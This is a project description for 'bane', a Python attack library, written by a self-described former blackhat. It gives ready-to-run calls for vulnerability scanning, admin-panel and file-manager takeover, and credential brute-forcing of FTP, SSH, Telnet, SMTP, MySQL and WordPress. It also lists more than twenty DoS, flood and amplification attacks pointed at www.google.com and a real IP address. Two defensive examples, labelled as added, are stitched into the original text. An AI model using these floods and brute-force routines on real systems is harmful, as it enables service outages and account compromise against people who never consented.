cyber security library
Project description
"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)
INTRODUCTION:
This Python library is made for educational purposes only. I, as the creator and developer, am not responsible for any misuse of this module in any malicious activity. It is made as a tool to understand how hackers can create their tools and perform their attacks. It contains most of the known attacks and exploits. It can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scraping proxies, crawling, Google dorking, checking for vulnerabilities (SQL injection (all types), XSS, command execution, PHP code injection, FI, forced browsing) and even more ;)
SPECIAL SPEECH:
this is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:
-S0u1 ( https://www.facebook.com/S0u1.HLoTW ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engineering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarchist, ops organizer, programmer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)
now let's start some tutorials, shall we?
TUTORIALS:
I-INSTALLING THE LIBRARY AND IMPORTING:
you can use pip to do that:
pip install bane
or you can clone the project's link then run setup.py
git clone https://github.com/AlaBouali/bane
cd bane
python setup.py install
to import it you just do:
import bane
NOTES:
-Windows users can't use bane.ssh1() and bane.telnet1() because they depend on pexpect, which needs the expect package to work, and that package can't be installed on Windows.
-Termux users can't use this library because some modules can't be installed, so it's pointless :(
II-USAGE:
this module has many incredible, useful and easy-to-use functions that can be implemented in any project that is related to Web Application Security.
Vulnerabilities:
default parameters:
logs=True (print the test's result on the screen, set to False to not display).
returning=False (return a value indicating the success (1/True) or fail (0/False) of the test).
timeout: timeout value.
proxy: same way as you use "proxies" parameters in requests.
1-SQL-Injection:
(useful link: https://www.acunetix.com/websitesecurity/sql-injection2/ )
let's start with simple SQL Injection testing. there are several techniques that can tell us whether the web application is vulnerable to SQL Injection or not:
-Error Based.
-boolean based.
-time based.
here we have functions that can determine whether the web application is vulnerable to SQL Injection or not using the mentioned techniques.
bane.sqlieb('http://example.com/index.php?id=5')#testing for Error Based SQLI
bane.sqlitb('http://example.com/index.php?id=5')#testing for Time Based SQLI
bane.sqlibb('http://example.com/index.php?id=5')#testing for Boolean Based SQLI
they return only 2 possible results:
False: the target is not vulnerable.
True: the target is vulnerable.
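The error-based and boolean-based signals described above, shown from the application side as an added example (not part of bane or of the original page). The table, the sample rows and the function names are constructed for illustration; the same request value is run against a concatenated query and against a bound-parameter query on an in-memory SQLite database.

```python
import sqlite3

def make_db():
    # Constructed sample data, held in memory only
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(5, "news"), (6, "about")])
    return db

def lookup_concat(db, raw_id):
    # Weak form: the request value is pasted into the SQL text
    try:
        return db.execute("SELECT title FROM pages WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        # Database error text reaching the client is the error-based signal
        return "error: %s" % exc

def lookup_bound(db, raw_id):
    # Hardened form: reject non-integers, then bind the value as a parameter
    try:
        page_id = int(raw_id)
    except ValueError:
        return []
    return db.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchall()

def input_changes_query_logic(lookup, db):
    # A true and a false condition appended to the same id give the same answer
    # when the input is treated as data; a difference means it was parsed as SQL
    # (the boolean-based signal).
    return lookup(db, "5 AND 1=1") != lookup(db, "5 AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("concatenated query affected:", input_changes_query_logic(lookup_concat, db))
    print("bound query affected:", input_changes_query_logic(lookup_bound, db))
    print("malformed input, concatenated:", lookup_concat(db, "5'"))
    print("malformed input, bound:", lookup_bound(db, "5'"))
```
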
2-XSS:
(useful link: https://www.acunetix.com/vulnerabilities/web/cross-site-scripting/ )
Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can execute malicious scripts in a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
here we have a function to get all html inputs in any webpage and test each input one by one against this attack with both: GET and POST methods.
bane.xss('https://xss-game.appspot.com/level1/frame')
output:
Getting parameters
Test has started
Payload:
parameter: query method: GET=> [+]Payload was found
parameter: query method: POST=> [-]Payload was not found
there is a default payload which is used in case you didn't set the "payload" parameter (set by default to: None) to any XSS payload. you can set different XSS payloads to test every time, with the possibility to use a proxy.
there are other functions to test with:
bane.xssget('http://example.com/index.php',{parameter: xss-payload-here})
bane.xsspost('http://example.com/index.php',{parameter: xss-payload-here})
3-FI:
(File Inclusion): (useful link: https://www.acunetix.com/vulnerabilities/web/file-inclusion/ )
we can test a web application if it is vulnerable to FI using this function:
bane.fi('http://example.com/index.php?file=page1.php')
it returns (in case the parameter "returning" set to: True) a dict that contains
{
"Status" : status, # ==> True if success or False if fail
"Nullbyte" : nullbyte, # ==> True if "nullbyte" parameter is set to True
"Link" : r.url # ==> the result URL
}
4-PHP code injection:
(useful link: https://www.acunetix.com/vulnerabilities/web/php-code-injection/ )
to test a web application against PHP code injection we can use this function:
bane.injectlink('http://example.com/index.php?id=2')
if it returns:
False: not vulnerable
True: vulnerable
you can use other functions to do that as well:
bane.getinject('http://example.com/index.php',param=parameter-here)
bane.postinject('http://example.com/index.php',param=parameter-here)
5-command injection:
(useful link: https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013) )
OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
here we can test the web application against this type of vulnerability using these functions:
bane.execlink('http://example.com/index.php?doc=1')
bane.getexec('http://example.com/index.php',param=your_parameter_here)
bane.postexec('http://example.com/index.php',param=your_parameter_here)
5-forced browsing:
(useful link: https://www.owasp.org/index.php/Forced_browsing )
Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible.
An attacker can use Brute Force techniques to search for unlinked contents in the domain directory, such as temporary directories and files, and old backup and configuration files. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.
This attack is performed manually when the application index directories and pages are based on number generation or predictable values, or using automated tools for common files and directory names.
This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.
admin panel:
we can access and enumerate some or all internal admin panel pages using this method and takeover the panel!!!
bane.forcebrowsing('http://example.com/admin/' , ext="php",timeout=10)
or
bane.forcebrowsing('http://example.com/admin/' , ext="asp")
also you can use a function here to find the site's admin login panel:
bane.adminpanel('http://example.com/admin/' , ext="php",timeout=7)
the default extension is "php", you can change it as you like to: asp, aspx using the parameter "ext".
filemanager:
we can bruteforce the path to a possible filemanager and take it over using this technique:
bane.filemanager('http://example.com')
6-Slow DoS vulnerabilities:
(useful link: https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/ )
high timeout value:
bane.timeouttest('www.google.com',port=443)
slow GET attack test:
bane.slowgettest('www.google.com',port=80)
slow POST attack test:
bane.slowposttest('www.google.com',port=80)
slow read attack test:
bane.slowreadtest('www.google.com',port=80)
connections per IP test:
bane.connectionslimit('www.google.com',port=80)
7-Bruteforce attacks:
(useful link: https://www.acunetix.com/vulnerabilities/web/login-page-password-guessing-attack/ )
here we are doing a bruteforce attack against a target using a list of usernames and passwords. if the login function returns True, then the logins were found, else it failed.
FTP:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.ftp("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
SSH:
here we have 2 different ways to log in to an ssh server:
ssh1:
(using pexpect module with "spawn" instead of "pexssh", which is more clever)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.ssh1("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
ssh2:
(using paramiko module)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.ssh2("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
TELNET:
here we have 2 different ways to log in to a telnet server:
telnet1:
(using pexpect module with "spawn" instead of "pexssh", which is more clever)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.telnet1("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
telnet2:
(using telnetlib module)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.telnet2("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
SMTP:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.smtp("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
MYSQL:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.mysql("example.com",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
ADMIN LOGIN:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.adminlogin("http://example.com/admin/login.php",{'username':user,'password':pwd})==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
WORDPRESS ADMIN LOGIN:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
    user=x.split(":")[0]
    pwd=x.split(":")[1]
    print("[*]Trying: "+user+" "+pwd)
    if bane.wpadmin("http://example.com/",username=user,password=pwd)==True:
        print('[+]Found')
        break
    else:
        print('[-]Failed')
HYDRA TOOL:
hydra is a famous tool that is widely used for bruteforce attacks. here is a python version of it based on the above functions.
it takes the following parameters:
proto:set by default to: "ssh", it can be set to: "ftp","ssh","telnet","smtp","mysql","wp" (to bruteforce WP sites on HTTP protocol)
p: target port, set by default to: 22
wl: the list contains usernames and passwords separated by ":", ex: ["admin:admin","admin:12345","root:root"]
wordlist=["admin:admin","admin:12345","root:root"]
bane.hydra("127.0.0.1",proto="telnet",p=23,wl=wordlist)
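What the wordlist loops above look like from the server side, as an added example (not part of bane or of the original page): a detector that flags a source address producing several failed logins inside a short window. The log lines are constructed in the style of OpenSSH auth logs with ISO timestamps assumed, and the threshold and window values are illustrative assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (documentation-range addresses, ISO timestamps assumed)
SAMPLE_LOG = """\
2024-01-01T10:00:01 host sshd[811]: Failed password for admin from 203.0.113.7 port 40112 ssh2
2024-01-01T10:00:02 host sshd[812]: Failed password for admin from 203.0.113.7 port 40113 ssh2
2024-01-01T10:00:03 host sshd[813]: Failed password for invalid user root from 203.0.113.7 port 40114 ssh2
2024-01-01T10:00:09 host sshd[820]: Failed password for alice from 198.51.100.4 port 51000 ssh2
2024-01-01T10:00:30 host sshd[821]: Accepted password for alice from 198.51.100.4 port 51001 ssh2
2024-01-01T10:05:00 host sshd[830]: Failed password for admin from 203.0.113.7 port 40200 ssh2
"""

FAILED = re.compile(
    r"^(\S+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def guessing_sources(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return {source: sorted usernames} for sources with >= threshold failures inside window."""
    recent = defaultdict(deque)   # source -> (time, user) of failures still inside the window
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and unrelated lines are ignored
        when = datetime.fromisoformat(m.group(1))
        user, src = m.group(2), m.group(3)
        q = recent[src]
        q.append((when, user))
        while when - q[0][0] > window:
            q.popleft()           # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged.setdefault(src, set()).update(u for _, u in q)
    return {src: sorted(users) for src, users in flagged.items()}

if __name__ == "__main__":
    for src, users in guessing_sources(SAMPLE_LOG).items():
        print(src, "tried", users)
```

A single mistyped password followed by a successful login (the 198.51.100.4 lines) stays below the threshold and is not flagged.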
DoS / DDoS:
(useful link: https://en.wikipedia.org/wiki/Denial-of-service_attack )
bane.hulk('www.google.com',threads=1000) #hulk attack
bane.proxhulk('www.google.com',threads=1000) #hulk attack with http proxies
bane.slowloris('www.google.com',p=80,threads=50) #slowloris attack
bane.xerxes('www.google.com',p=443,threads=500) #xerxes attack
bane.httpflood('www.google.com',p=80,threads=1000) #http flood
bane.lulzer('www.google.com',p=80,threads=1000) #http flood with proxies
bane.tcpflood('www.google.com',threads=1000) #tcp flood
bane.udp('50.63.33.34',p=80) #udp flood
bane.doser('https://www.google.com',threads=500)
bane.proxdoser('https://www.google.com',threads=500)
bane.torshammer('www.google.com',p=80,threads=1000)
bane.slowread('www.google.com',p=80,threads=1000)
bane.apachekiller('www.google.com',p=80,threads=500)
bane.goldeneye('www.google.com',p=80,threads=1000)
bane.medusa('www.google.com',p=80,threads=1000)
bane.icmp('50.63.33.34',p=80,threads=100)
bane.synflood('50.63.33.34',p=80,threads=100)
bane.icmpstorm('50.63.33.34',p=80,threads=100)
bane.land('50.63.33.34',p=80,threads=100)
bane.udpstorm('50.63.33.34',p=80,threads=100)
bane.blacknurse('50.63.33.34',p=80,threads=100)
bane.dnsamplif('50.63.33.34',p=80,dnslist=[your_dns_servers_list_here],threads=100)
bane.ntpamplif('50.63.33.34',p=80,dnslist=[your_ntp_servers_list_here],threads=100)
bane.snmpamplif('50.63.33.34',p=80,dnslist=[your_snmp_servers_list_here],threads=100)